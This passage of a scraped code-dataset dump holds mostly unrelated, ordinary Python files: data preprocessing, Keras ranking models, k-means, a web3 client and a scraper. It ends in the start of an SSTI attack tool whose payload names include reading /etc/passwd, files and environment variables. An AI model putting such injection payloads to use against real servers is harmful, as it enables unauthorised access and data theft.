}","repo_name":"JavierMartinezZgz/CHC","sub_path":"chc/perros/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7303517413","text":"import os\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom fancyimpute import IterativeImputer\r\nfrom sklearn import preprocessing\r\n\r\n#########################################################\r\n\r\n\r\njob_name = 'expression_and_ppi'\r\nresults_dir = '../results/%s' % job_name\r\nf = \"%s/df_complete_dataset.csv\" % results_dir\r\n\r\nif not os.path.exists(results_dir):\r\n os.makedirs(results_dir)\r\n\r\nremove_features = False\r\nkeep_features = False\r\nfeatures_to_keep = ['_expression', '_interactors', '_interactions'] # choose here one at a time\r\n\r\nonly_disease_causing_genes = False\r\n\r\nmerge_brain_labels = True\r\nmerge_heart_labels = True\r\nmerge_all_causal = False\r\nunclassified_is_false = True\r\n\r\nnetwork_na_is_zero = True\r\n\r\niterative_impute = True\r\nna_is_zero = not iterative_impute\r\nimpute_lcv = not iterative_impute\r\nimpute_paralogs = not 
iterative_impute\r\n\r\nboolean_is_binary = True\r\nadd_pca = False\r\npower_transform_expression_data = True\r\nscale_data = True\r\n\r\nprepare_data = True\r\n\r\n#########################################################\r\n\r\n\r\ndef load_dataset(file_path='', remove_non_expressed=True):\r\n df = pd.read_csv(file_path, index_col=0)\r\n\r\n num_expression_tissues = count_num_expression_tissues(df)\r\n print('num_expression_tissues:', num_expression_tissues)\r\n\r\n num_lables = sum('_causal' in s for s in list(df.columns.values))\r\n print('num_lables :', num_lables)\r\n\r\n num_features = len(list(df.columns.values)) - num_lables\r\n print('num_features: ', num_features)\r\n\r\n if remove_non_expressed:\r\n df = remove_non_expressed_genes(df, num_expression_tissues)\r\n print('num of expressed genes in dataset:', df.shape)\r\n\r\n print('num genes in dataset:', df.shape)\r\n\r\n return df, num_features\r\n\r\n\r\ndef load_adapted_dataset(results_dir):\r\n df = pd.read_csv(\"%s/df_complete_dataset_ready_adapted_no_missing_values.csv\" % results_dir, index_col=0)\r\n\r\n num_lables = sum('_causal' in s for s in list(df.columns.values))\r\n print('num_lables :', num_lables)\r\n\r\n num_features = len(list(df.columns.values)) - num_lables\r\n print('num_features: ', num_features)\r\n\r\n return df, num_features\r\n\r\n\r\ndef remove_non_expressed_genes(input_df, num_expression_tissues):\r\n new_df = input_df\r\n new_df = new_df.dropna(subset=list(input_df.columns.values)[:num_expression_tissues], how='all')\r\n\r\n return new_df\r\n\r\n\r\ndef remove_non_causal_genes(input_df, num_features):\r\n new_df = input_df.dropna(subset=[list(input_df.columns.values)[num_features:]], inplace=False, how='all')\r\n\r\n return new_df\r\n\r\n\r\ndef merge_heart_causal(input_df):\r\n new_df = input_df\r\n\r\n new_df.loc[(new_df['heart_atrial_appendage_causal'] == 1) | (new_df['heart_left_ventricle_causal'] == 1),\r\n 'heart_causal'] = 1\r\n\r\n return new_df\r\n\r\n\r\ndef merge_brain_causal(input_df):\r\n new_df = input_df\r\n\r\n new_df.loc[(new_df['brain-not_specific_causal'] == 1) | (new_df['brain-0_causal'] == 1) |\r\n (new_df['brain-1_causal'] == 1) | (new_df['brain-2_causal'] == 1),\r\n 'brain_causal'] = 1\r\n\r\n return new_df\r\n\r\n\r\ndef remove_features_containing(input_df, feature, total_num_features):\r\n\r\n feature_to_remove = feature\r\n cols = list(input_df.columns.values)\r\n cols_to_remove = [s for s in cols if ((feature_to_remove in s) and ('causal' not in s))]\r\n new_df = input_df.drop(cols_to_remove, axis=1)\r\n return_num_features = total_num_features - len(cols_to_remove)\r\n\r\n return new_df, return_num_features\r\n\r\n\r\ndef keep_features_containing(input_df, feature_strings_to_keep, total_num_features):\r\n\r\n cols = list(input_df.columns.values)\r\n feature_strings_to_keep.append('causal')\r\n print('feature_strings_to_keep:', feature_strings_to_keep)\r\n\r\n cols_to_remove = set()\r\n\r\n for col in cols:\r\n print(col)\r\n if all(feature_to_keep not in col for feature_to_keep in feature_strings_to_keep):\r\n cols_to_remove.add(col)\r\n\r\n cols_to_remove_list = list(cols_to_remove)\r\n print(cols_to_remove_list)\r\n new_df = input_df.drop(cols_to_remove_list, axis=1)\r\n\r\n return_num_features = total_num_features - len(cols_to_remove_list)\r\n\r\n return new_df, return_num_features\r\n\r\n\r\ndef power_transform_expression(input_df):\r\n cols = list(input_df.columns.values)\r\n expression_cols = [s for s in cols if 'expression' in s]\r\n print(expression_cols)\r\n\r\n 
transformer = preprocessing.PowerTransformer(method='yeo-johnson')\r\n input_df.loc[:, expression_cols] = transformer.fit_transform(input_df.loc[:, expression_cols])\r\n\r\n new_df = input_df\r\n\r\n return new_df\r\n\r\n\r\ndef turn_unclassified_to_false(input_df, num_features):\r\n new_df = input_df\r\n new_df[list(input_df.columns.values)[num_features:]] = \\\r\n input_df[list(input_df.columns.values)[num_features:]].fillna(False)\r\n\r\n return new_df\r\n\r\n\r\ndef lcv_na_to_median(input_df):\r\n cols = [s for s in input_df.columns.values if 'LCV' in s]\r\n new_df = input_df\r\n new_df[cols] = new_df[cols].fillna(new_df[cols].median())\r\n\r\n return new_df\r\n\r\n\r\ndef paralogs_na_to_median(input_df):\r\n cols = [s for s in input_df.columns.values if 'paralogs' in s]\r\n new_df = input_df\r\n new_df[cols] = new_df[cols].fillna(new_df[cols].median())\r\n\r\n return new_df\r\n\r\n\r\ndef na_to_zero(input_df, cols):\r\n new_df = input_df\r\n new_df[cols] = input_df[cols].fillna(0)\r\n\r\n return new_df\r\n\r\n\r\ndef boolean_to_binary(input_df):\r\n new_df = input_df\r\n\r\n new_df = new_df.applymap(lambda x: 1 if x == True else x)\r\n new_df = new_df.applymap(lambda x: 0 if x == False else x)\r\n\r\n return new_df\r\n\r\n\r\ndef count_num_expression_tissues(input_df):\r\n cols = list(input_df.columns.values)\r\n count = 0\r\n for ele in cols:\r\n if 'expression' in ele and 'preferential' not in ele:\r\n count = count + 1\r\n return count\r\n\r\n\r\ndef run_prepare_dataset(job_name='', features_to_keep=None):\r\n\r\n results_dir = '../results/%s' % job_name\r\n if not os.path.exists(results_dir):\r\n os.makedirs(results_dir)\r\n\r\n print('preparing data')\r\n\r\n if prepare_data:\r\n\r\n df_complete, num_features = load_dataset(f)\r\n\r\n if only_disease_causing_genes:\r\n df_complete = remove_non_causal_genes(df_complete, num_features)\r\n\r\n if merge_heart_labels:\r\n df_complete = merge_heart_causal(df_complete)\r\n\r\n if merge_brain_labels:\r\n df_complete = merge_brain_causal(df_complete)\r\n\r\n if remove_features:\r\n feature_to_remove = 'preferential' # choose here one at a time\r\n df_complete, num_features = remove_features_containing(df_complete, feature_to_remove, num_features)\r\n\r\n if keep_features:\r\n df_complete, num_features = keep_features_containing(df_complete, features_to_keep, num_features)\r\n\r\n print(df_complete)\r\n # num_features = len([s for s in list(df_complete.columns.values) if (feature_to_keep in s)])\r\n\r\n print('new num_features:', num_features)\r\n\r\n if unclassified_is_false:\r\n df_complete = turn_unclassified_to_false(df_complete, num_features)\r\n\r\n if boolean_is_binary:\r\n df_complete = boolean_to_binary(df_complete)\r\n\r\n if impute_lcv:\r\n df_complete = lcv_na_to_median(df_complete)\r\n\r\n if impute_paralogs:\r\n df_complete = paralogs_na_to_median(df_complete)\r\n # df_complete = paralogs_ratio_to_1(df_complete)\r\n\r\n if na_is_zero:\r\n df_complete = na_to_zero(df_complete, list(df_complete.columns.values)[:num_features])\r\n\r\n if network_na_is_zero:\r\n\r\n cols = list(df_complete.columns.values)\r\n cols_to_impute = [s for s in cols if 'num' in s]\r\n\r\n df_complete = na_to_zero(df_complete, cols_to_impute)\r\n\r\n if power_transform_expression_data:\r\n df_complete = power_transform_expression(df_complete)\r\n\r\n if scale_data:\r\n scaler = preprocessing.MinMaxScaler(feature_range=(-1, 1))\r\n df_complete.iloc[:, :num_features] = scaler.fit_transform(df_complete.iloc[:, :num_features])\r\n\r\n if 
iterative_impute:\r\n df_complete.iloc[:, :num_features] = IterativeImputer(max_iter=10,\r\n tol=0.01,\r\n verbose=2,\r\n initial_strategy=\"median\",\r\n n_nearest_features=100,\r\n # sample_posterior=True,\r\n random_state=0).fit_transform(df_complete.iloc[:,\r\n :num_features])\r\n\r\n # test dataset for NaNs and non-finits\r\n mat = df_complete.iloc[:, :num_features]\r\n print(np.any(np.isnan(mat)))\r\n print(np.all(np.isfinite(mat)))\r\n\r\n df_complete.to_csv('%s/df_complete_dataset_ready_adapted_no_missing_values.csv' % results_dir)\r\n\r\n else:\r\n df_complete, num_features = load_adapted_dataset(results_dir)\r\n\r\n if keep_features:\r\n\r\n df_complete, num_features = keep_features_containing(df_complete, features_to_keep, num_features)\r\n\r\n print(df_complete)\r\n\r\n print('new num_features:', num_features)\r\n\r\n df_complete.to_csv('%s/df_complete_dataset_ready_adapted_no_missing_values.csv' % results_dir)\r\n\r\n return\r\n","repo_name":"eyalsim/trace","sub_path":"src/prepare_trace_dataset.py","file_name":"prepare_trace_dataset.py","file_ext":"py","file_size_in_byte":9614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2660052794","text":"\"\"\"\nMain entrance to commandline actions\n\"\"\"\nimport click\n\nfrom optimus.cli.version import version_command\nfrom optimus.cli.startproject import startproject_command\nfrom optimus.cli.build import build_command\nfrom optimus.cli.watch import watch_command\nfrom optimus.cli.po import po_command\nfrom optimus.cli.runserver import runserver_command\nfrom optimus.logs import init_logger\n\n\n# Help alias on '-h' argument\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"])\n\n# Default logger conf\nOPTIMUS_LOGGER_CONF = (\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\", None)\n\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n@click.option(\n \"-v\",\n \"--verbose\",\n type=click.IntRange(min=0, max=5),\n default=4,\n metavar=\"INTEGER\",\n help=(\n \"An integer between 0 and 5, where '0' make a totaly silent output and '5' \"\n \"set level to DEBUG (the most verbose level). 
Default to '4' (Info level).\"\n ),\n)\n@click.option(\n \"--test-env\",\n is_flag=True,\n hidden=True,\n help=(\n \"Just an option to run for test and enable some specific tricks to run \"\n \"correctly\"\n ),\n)\n@click.pass_context\ndef cli_frontend(ctx, verbose, test_env):\n \"\"\"\n Optimus is a static site builder using Jinja2, webassets and Babel.\n \"\"\"\n printout = True\n if verbose == 0:\n verbose = 1\n printout = False\n\n # Verbosity is the inverse of logging levels\n levels = [item for item in OPTIMUS_LOGGER_CONF]\n levels.reverse()\n # Init the logger config\n root_logger = init_logger(levels[verbose], printout=printout)\n\n # Init the default context that will be passed to commands\n ctx.obj = {\n \"verbosity\": verbose,\n \"logger\": root_logger,\n \"test_env\": test_env,\n }\n\n\n# Attach commands methods to the main grouper\ncli_frontend.add_command(version_command, name=\"version\")\ncli_frontend.add_command(startproject_command, name=\"init\")\ncli_frontend.add_command(build_command, name=\"build\")\ncli_frontend.add_command(watch_command, name=\"watch\")\ncli_frontend.add_command(po_command, name=\"po\")\ncli_frontend.add_command(runserver_command, name=\"runserver\")\n","repo_name":"sveetch/Optimus","sub_path":"optimus/cli/console_script.py","file_name":"console_script.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"21627011450","text":"import sys\n\nsys.setrecursionlimit(10 ** 5 + 1)\n\ndef dfs(i, V, E):\n for k in E[i].keys():\n if V[k] >= 0:\n continue\n if E[i][k] % 2:\n V[k] = 1 - V[i]\n else:\n V[k] = V[i]\n V = dfs(k, V, E)\n return V\n\nn = int(input())\nE = {}\nfor i in range(n - 1):\n ui, vi, wi = map(int, input().split())\n if ui in E.keys():\n E[ui][vi] = wi\n else:\n E[ui] = {vi: wi}\n if vi in E.keys():\n E[vi][ui] = wi\n else:\n E[vi] = {ui: wi}\nV = [-1 for _ in range(n + 1)]\nV[1] = 0\nV = dfs(1, V, E)\nfor vi in V[1:]:\n print(vi)\n","repo_name":"mgmk2/atcoder-python","sub_path":"ABC/126/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"37665496232","text":"\nfrom keras.models import load_model\nfrom keras.initializers import glorot_uniform\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.layers import Dropout\nimport tensorflow.keras.backend as K\n#from tensorflow import set_random_seed\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras.initializers import Constant\nfrom tqdm import tqdm_notebook as tqdm\nfrom Data_Tools import *\nfrom utils import *\nimport time\n\n\ndef Pz_keras(y_pred):\n '''\n Top1 probability, described in the original ListNet paper\n '''\n\n return K.exp(y_pred)/K.sum(K.exp(y_pred))\n\n\ndef Loss_query_keras(y,y_pred):\n\n '''\n Cross entropy with top 1 probability,\n \n\n Careful, if values of y, are greater than 1000, there is risk of a numerical error,\n and the vector has to be scaled\n Following a form like:\n \n #ratio=50\n #y_pred=(y_pred-K.min(y_pred))*ratio/(K.max(y_pred)-K.min(y_pred))\n #y=(y-K.min(y))*ratio/(K.max(y)-K.min(y))\n ''' \n\n return -K.sum(Pz_keras(y)*K.log(Pz_keras(y_pred)))\n\ndef set_libraries_seeds(my_seed=1):\n '''\n Sets the random seeds of all the envirionments we use, to a constant.\n '''\n np.random.seed(my_seed) # NumPy\n random.seed(my_seed) # Python\n (my_seed) 
# Tensorflow\n\ndef load_models(model_names,path):\n '''\n Loads a pretrained ListNet Model list. \n ''' \n model_list=[]\n for m in (model_names):\n #load model\n path_model=path+m\n #The costum_objects parameter is very important. Otherwise keras will not understand the loss function. Nor the initializers used for the layers.\n modelq = load_model(path_model, custom_objects={'Loss_query_keras': Loss_query_keras,\n 'GlorotUniform': glorot_uniform()})\n model_list.append(modelq)\n print('Model Successfully Loaded')\n \n return model_list\n\ndef load_model_LTR(model_path):\n '''\n Loads a pretrained ListNet Model. \n ''' \n \n #The costum_objects parameter is very important. Otherwise keras will not understand the loss function. Nor the initializers used for the layers.\n modelq = load_model(model_path, custom_objects={'Loss_query_keras': Loss_query_keras,\n 'GlorotUniform': glorot_uniform()})\n\n return modelq\n\ndef create_model(number_of_features,\n optimizer,\n initializer=tf.keras.initializers.glorot_uniform(seed=1),\n neurons_per_layer=[1],\n activation_function='relu',\n final_activation='sigmoid',\n dropout=0,\n bias=0.1):\n modelq = Sequential()\n modelq.add(Dense(neurons_per_layer[0], \n input_dim=number_of_features,\n activation=activation_function,\n kernel_initializer=initializer,\n bias_initializer=Constant(value=bias)))\n if(neurons_per_layer[0]>1):\n modelq.add(Dropout(dropout))\n if(len(neurons_per_layer)>1 or neurons_per_layer[-1]>1):\n for neurons in neurons_per_layer[1:]:\n modelq.add(Dense(neurons, activation=activation_function,\n kernel_initializer=initializer,\n bias_initializer=Constant(value=bias)))\n modelq.add(Dropout(dropout))\n \n modelq.add(Dense(1, activation=final_activation,\n kernel_initializer=initializer,\n bias_initializer=Constant(value=bias)))\n \n modelq.compile(loss=Loss_query_keras, optimizer=optimizer)\n return modelq\n\ndef generate_predictions_grid(path,\n data_vali,\n data_train,\n data_test,\n x_list_train,\n y_list_train,\n epochs=[50],\n learning_rate=[0.075],\n mon=[0.5],\n act=['relu'],\n number_neurons=[1],\n dropout=[0.5],\n final_activ=['linear'],\n hidden_layers=[0],\n name='',\n index=0.5,\n decresing_architecture=False,\n show_summary=False,\n save_model=False):\n\n t_ini=time.time()\n total_it=len(epochs)*len(learning_rate)*len(mon)*\\\n len(act)*len(number_neurons)*len(dropout)*\\\n len(final_activ)*len(hidden_layers)\n\n print(\"\\n\\n\\nName of predictions will be of form: \"+\\\n name+\",\\nwith starting at\",index,\n \"finishing at\",index+total_it-1,\"\\n\\n\\n_\")\n name_orig=name\n\n counter=1\n for my_iter in (product(epochs,learning_rate,mon,act,number_neurons,\n dropout,final_activ,hidden_layers)):\n name=name_orig+str(index)\n n_iter=my_iter[0]\n n_=my_iter[1]\n mom_=my_iter[2]\n act_=my_iter[3]\n n_neurons_=my_iter[4]\n dropout_=my_iter[5]\n final_act=my_iter[6]\n hidden_layers_=my_iter[7]\n opt = SGD(lr=n_, momentum=mom_)\n if(hidden_layers_>0):\n\n\t neurons_per_layer=np.repeat(n_neurons_,hidden_layers_)\n\t if(decresing_architecture):\n\t neurons_per_layer=np.array([neuron//2**index for index,neuron in \\\n\t enumerate(neurons_per_layer)])\n\t neurons_per_layer=neurons_per_layer[neurons_per_layer>1]\n else:\n \tneurons_per_layer=[n_neurons_]\n\n\n modelq=create_model(optimizer=opt,\n number_of_features=x_list_train[0].shape[1],\n neurons_per_layer=neurons_per_layer,\n activation_function=act_,\n final_activation=final_act,\n dropout=dropout_)\n if(show_summary):\n display(modelq.summary())\n\n\n for j in 
tqdm(range(n_iter)):\n\n for ki in range(len(y_list_train)):\n if final_act=='sigmoid':\n loss_qi=modelq.train_on_batch(x=x_list_train[ki],y=y_list_train[ki]/2)\n else:\n loss_qi=modelq.train_on_batch(x=x_list_train[ki],y=y_list_train[ki])\n\n print(\"Iteration:\",counter,\"/\",total_it)\n print(\"Time elapsed so far:\")\n print(convert_to_time(time.time()-t_ini))\n print(my_iter,\"\\n\\n\\n\")\n if(save_model):\n modelq.save(path+'models/model_'+name+'.h5')\n index+=1\n counter+=1\n\n y_pred_train=modelq.predict(data_train.drop(['relevance degree','qid'],axis=1)).astype('float64').ravel()\n df_train=pd.DataFrame(y_pred_train)\n df_train.to_csv(path+'predictions/y_train_'+name+'.txt',sep=' ',header=False,index=False)\n\n y_pred_vali=modelq.predict(data_vali.drop(['relevance degree','qid'],axis=1)).astype('float64').ravel()\n df_vali=pd.DataFrame(y_pred_vali)\n df_vali.to_csv(path+'predictions/y_vali_'+name+'.txt',sep=' ',header=False,index=False)\n\n y_pred_test=modelq.predict(data_test.drop(['relevance degree','qid'],axis=1)).astype('float64').ravel()\n df_test=pd.DataFrame(y_pred_test)\n df_test.to_csv(path+'predictions/y_test_'+name+'.txt',sep=' ',header=False,index=False)\n\n\ndef convert_to_time(seconds): \n return time.strftime(\"(Hours:Minutes:Seconds)\\n%H:%M:%S\", time.gmtime(seconds)) \n\n\n\n\n\n\n","repo_name":"francelabs/ListNetReproducibilityStudy","sub_path":"code/LTR4L analysis/Deep_Learning_Tools.py","file_name":"Deep_Learning_Tools.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3997383675","text":"#Дан файл инпута, надо считать строки и вывести йес, если каждая послед строка\r\n# длиннее предыдущей, иначе ноу, и вывод в файл аутпута сделать\r\n\r\na = list(map(str,input().split()))\r\nok = True\r\nfor i in range(1,len(a)):\r\n if len(a[i-1]) > len(a[i]):\r\n ok = False\r\n break\r\nif ok:\r\n print(\"Yes\")\r\nelse: \r\n print(\"NO\") ","repo_name":"araytemirkhann/Python_","sub_path":"python_code/98.py","file_name":"98.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1449300099","text":"import unittest\r\nfrom os import path\r\n\r\nfrom graph import Graph\r\nfrom graph.algorithms import prim\r\nfrom graph.reader import Reader\r\n\r\nclass TestMinimumSpanningTree(unittest.TestCase):\r\n\r\n @classmethod\r\n def setUpClass(self):\r\n\r\n arquivo = path.join(\"datasets\", \"osti\", \"b01.stp\")\r\n\r\n reader = Reader()\r\n\r\n self.stp = reader.parser(arquivo)\r\n\r\n self.graph = Graph(vertices=self.stp.nro_nodes,edges=self.stp.graph)\r\n\r\n def test_mst_cost(self):\r\n start_node = 34\r\n _, cost = prim(self.graph,start_node)\r\n\r\n self.assertGreater(cost,0)\r\n self.assertEqual(cost,238)\r\n\r\n\r\nif __name__ == \"__main__\" :\r\n unittest.main()","repo_name":"GiliardGodoi/binary-ga-stpg","sub_path":"graph/test/test_mst.py","file_name":"test_mst.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2028327811","text":"__author__ = 'gregor'\n\nimport numpy as np\n\n\ndef cluster_points(X, mu):\n clusters = {}\n for x in X:\n bestmukey = min([(i[0], np.linalg.norm(x - mu[i[0]])) for i in enumerate(mu)], key=lambda t: t[1])[0]\n try:\n clusters[bestmukey].append(x)\n except KeyError:\n clusters[bestmukey] = [x]\n return clusters\n\n\ndef reevaluate_centers(mu, 
clusters):\n newmu = []\n keys = sorted(clusters.keys())\n for k in keys:\n newmu.append(np.mean(clusters[k], axis=0))\n return newmu\n\n\ndef has_converged(mu, oldmu):\n return set([tuple(a) for a in mu]) == set([tuple(a) for a in oldmu])\n\n\ndef find_centers(X, K):\n # Initialize to K random centers\n idx = np.random.randint(len(X), size=K)\n oldmu = X[idx, :]\n idx = np.random.randint(len(X), size=K)\n mu = X[idx, :]\n while not has_converged(mu, oldmu):\n oldmu = mu\n # Assign all points in X to clusters\n clusters = cluster_points(X, mu)\n # Reevaluate centers\n mu = reevaluate_centers(oldmu, clusters)\n return (mu, clusters)\n\n\n# -------------------------------------------------------------------------------------------\ndef init_board(N):\n X = np.array([(np.random.uniform(-1, 1), np.random.uniform(-1, 1)) for i in range(N)])\n return X\n\n\ndef init_board_gauss(N, k):\n n = float(N) / k\n X = []\n for i in range(k):\n c = (np.random.uniform(-1, 1), np.random.uniform(-1, 1))\n s = np.random.uniform(0.05, 0.5)\n x = []\n while len(x) < n:\n a, b = np.array([np.random.normal(c[0], s), np.random.normal(c[1], s)])\n # Continue drawing points from the distribution in the range [-1,1]\n if abs(a) < 1 and abs(b) < 1:\n x.append([a, b])\n X.extend(x)\n X = np.array(X)[:N]\n return X\n\n\ndef init_board_gauss3d(N, k):\n n = float(N) / k\n X = []\n for i in range(k):\n c = (np.random.uniform(-1, 1), np.random.uniform(-1, 1), np.random.uniform(-1, 1))\n s = np.random.uniform(0.05, 0.5)\n x = []\n while len(x) < n:\n a, b, d = np.array([np.random.normal(c[0], s), np.random.normal(c[1], s), np.random.normal(c[2], s)])\n # Continue drawing points from the distribution in the range [-1,1]\n if abs(a) < 1 and abs(b) < 1 and abs(d) < 1:\n x.append([a, b, d])\n X.extend(x)\n X = np.array(X)[:N]\n return X\n\n\ndef plot_results(colors, mu, clusters, ax):\n for col, center, k in zip(colors, mu, [x for x in range(0, 5)]):\n ax.scatter(np.asarray(clusters[k])[:, 1], np.asarray(clusters[k])[:, 2], c=col)\n ax.scatter(center[1], center[2], c=\"#000000\", marker=\"x\", s=250, linewidth='3')\n","repo_name":"gbanusi/lloyd-clustering-alg","sub_path":"Nebitno/LloydAlg.py","file_name":"LloydAlg.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12486604127","text":"import web3\nimport json\n\n\nclass House:\n w3 = web3.Web3(web3.HTTPProvider('http://127.0.0.1:7545'))\n\n user_address = None\n\n with open('abi.json') as abifile:\n abi = json.load(abifile)\n\n with open('contract.txt') as file:\n contract_address = file.read()\n\n cntr = w3.eth.contract(\n address=contract_address,\n abi=abi\n )\n\n def auth(self, login):\n try:\n login = web3.Web3.toChecksumAddress(login)\n except Exception:\n return False\n else:\n self.user_address = web3.Web3.toChecksumAddress(login)\n log = self.w3.personal.unlockAccount(self.user_address, '1')\n self.w3.eth.defaultAccount = self.user_address\n return log\n\n def get_accounts(self):\n return self.w3.eth.accounts\n\n def get_admin(self):\n return self.cntr.call().admin()\n\n def reg_home(self, owner, address, square, period):\n owner = web3.Web3.toChecksumAddress(owner)\n address = str(address)\n square = int(square)\n period = int(period)\n self.cntr.functions.reg_home(owner, address, square, period).transact()\n\n def create_sale(self, ID_home, price):\n ID_home = int(ID_home)\n price = int(price)*(10**18)\n print('set price: %d' %price)\n 
self.cntr.functions.create_sale(ID_home, price).transact()\n\n def buy(self, ID_sale, price):\n ID_sale = int(ID_sale)\n price = web3.Web3.toWei(int(price), 'ether')\n self.cntr.functions.buy(ID_sale).transact({'value': price})\n\n def stop_sale(self, ID_sale):\n ID_sale = int(ID_sale)\n self.cntr.functions.stop_sale(ID_sale).transact()\n\n def get_home(self, ID_home):\n ID_home = int(ID_home)\n return self.cntr.functions.get_home(ID_home).call()\n\n def get_sale(self, ID_sale):\n ID_sale = int(ID_sale)\n return self.cntr.functions.get_sale(ID_sale).call()\n\n def get_homes_amount(self):\n return self.cntr.functions.get_homes_amount().call()\n\n def get_sales_amount(self):\n return self.cntr.functions.get_sales_amount().call()\n\n\n# h = House()\n# h.auth('0x356D7630B61EC74A4562E9CA5d464B406d754a52')\n# h.reg_home('0x627117c3bB529B18c50e4aFF24350C4B6deA594E', 'Петровская, 50', 70, 5)\n# h.reg_home('0xA969d347ae987E66d71e55500f10b1b52A07cdc9', 'Александровская, 127', 60, 8)\n# h.reg_home('0xA969d347ae987E66d71e55500f10b1b52A07cdc9', 'Чехова, 203', 230, 3)\n","repo_name":"ShamilyanOksana/ocean","sub_path":"house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8903577926","text":"from django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\nfrom django import forms\nfrom survey.forms.widgets import InlineRadioSelect\nfrom survey.models import Survey, BatchCommencement, SurveyHouseholdListing\n\n\nclass SurveyForm(ModelForm):\n # survey_listing = forms.CharField(choices=[(survey.pk, survey.name) for survey in Survey.objects.all()],\n # help_text='Select survey household listing to reuse. Leave empty for fresh listing',\n # required=False)\n class Meta:\n model = Survey\n fields = ['name', 'description', 'has_sampling', 'sample_size', 'preferred_listing']\n widgets = {\n 'description': forms.Textarea(attrs={\"rows\": 4, \"cols\": 50}),\n 'has_sampling': InlineRadioSelect(choices=((True, 'Sampled'), (False, 'Census')), attrs={'class' : 'has_sampling'}),\n }\n\n def __init__(self, *args, **kwargs):\n super(SurveyForm, self).__init__(*args, **kwargs)\n if kwargs.get('instance', None) and kwargs['instance'].has_sampling is False:\n self.fields['preferred_listing'].widget.attrs['disabled'] = 'disabled'\n else:\n preferred_listings = [('', '------ None, Create new -------'), ]\n survey_listings = SurveyHouseholdListing.objects.all()\n preferred_listings.extend(set([(l.survey.pk, l.survey.name) for l in survey_listings]))\n self.fields['preferred_listing'].choices = preferred_listings\n\n\n def clean(self):\n cleaned_data = self.cleaned_data\n\n has_sampling = cleaned_data.get('has_sampling', None)\n\n if has_sampling and not cleaned_data.get('sample_size', None):\n raise ValidationError('Sample size must be specified if has sampling is selected.')\n\n return cleaned_data\n\n def clean_name(self):\n name = self.cleaned_data['name']\n survey = Survey.objects.filter(name=name)\n instance_id = self.instance.id\n\n if not instance_id and survey:\n raise ValidationError(\"Survey with name %s already exist.\" % name)\n elif instance_id and survey and survey[0].id != instance_id:\n raise ValidationError(\"Survey with name %s already exist.\" % name)\n\n return 
self.cleaned_data['name']\n\n\n","repo_name":"ganeshbandhu/uSurvey","sub_path":"survey/forms/surveys.py","file_name":"surveys.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"14441478066","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\noptions.add_argument(\"--headless\")\ndriver = webdriver.Chrome('/home/zskyver/PycharmProjects/WebCrawler/chromedriver', chrome_options=options)\n\n\ndef buscador():\n busca = input(str(\"digite a sua busca: \"))\n busca.replace(\" \", \"%20\")\n driver.get(\"https://www.google.com/search?q=\" + busca)\n return driver\n\n\ndef tratamento_de_texto(buscador):\n links = []\n results = buscador.find_elements_by_class_name(\"g\")\n print(len(results))\n\n for i in range(len(results)):\n links.append(str(results[i].find_element_by_tag_name(\"a\").get_attribute(\"href\")))\n\n contador = 0\n\n\n for link in links:\n if link.__contains__(\"http\"):\n buscador.get(link)\n textos = buscador.find_elements_by_tag_name(\"p\")\n f = open(\"%s.txt\" % contador, \"w\")\n contador_paragrafos = 0\n for contador_paragrafos in range(len(textos)):\n f.write(textos[contador_paragrafos].text)\n contador = contador + 1\n f.close()\n print(\"Arquivo criado!\")\n buscador.quit()\n pass\n\n\ntratamento_de_texto(buscador())\n","repo_name":"zSkyver/webcrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43156501931","text":"#! /usr/bin/env python3\nimport os\nimport readline\nimport importlib\nfrom importlib import util\nimport xml.etree.ElementTree as ET\nspec = importlib.util.find_spec('.subserv', package='lib')\nm = spec.loader.load_module()\ntree = ET.parse('./src/sstiAttacks.xml')\nroot = tree.getroot()\n\n\ndef ListPayload():\n print(\"\\t**************************************************\\n\")\n print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE +\"\\tHere is the List of possible SSTI Payloads\\n\" + m.bcolors.ENDC)\n for attack in root.findall('attack'):\n name = attack.find('name').text\n\n print(\"\\tName of SSTI Attack: \" + m.bcolors.ERROR + m.bcolors.BOLD + name + m.bcolors.ENDC)\n\n\n\ndef complete(text,state):\n\n ssti = (\n 'Ruby_Basic_ERB', 'Ruby_Basic_Slim', 'Ruby_Read_Files', 'Ruby_List_Directories', 'Java_Basic_1', 'Java_Basic_2',\n 'Java_Basic_getPath', 'Java_Basic_getContent', 'Java_Env_Var', 'Java_passwd_1', 'Java_passwd_2', 'Twig_Basic_1',\n 